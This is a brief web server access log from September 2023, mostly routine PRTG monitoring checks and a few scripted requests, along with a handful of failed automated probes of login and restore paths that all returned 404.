212.91.246.72 - - [06/Sep/2023:07:56:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.14.26.208 - - [06/Sep/2023:07:57:34 +0200] "GET /restore.php HTTP/1.1" 404 316 "-" "-"
212.91.246.72 - - [06/Sep/2023:07:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.191.194 - - [06/Sep/2023:07:58:45 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Sep/2023:07:58:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.78.249.41 - - [06/Sep/2023:07:58:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
35.233.62.116 - - [06/Sep/2023:07:59:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
212.91.246.72 - - [06/Sep/2023:07:59:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:08:00:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:08:01:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.191.194 - - [06/Sep/2023:08:02:28 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [06/Sep/2023:08:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [06/Sep/2023:08:03:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
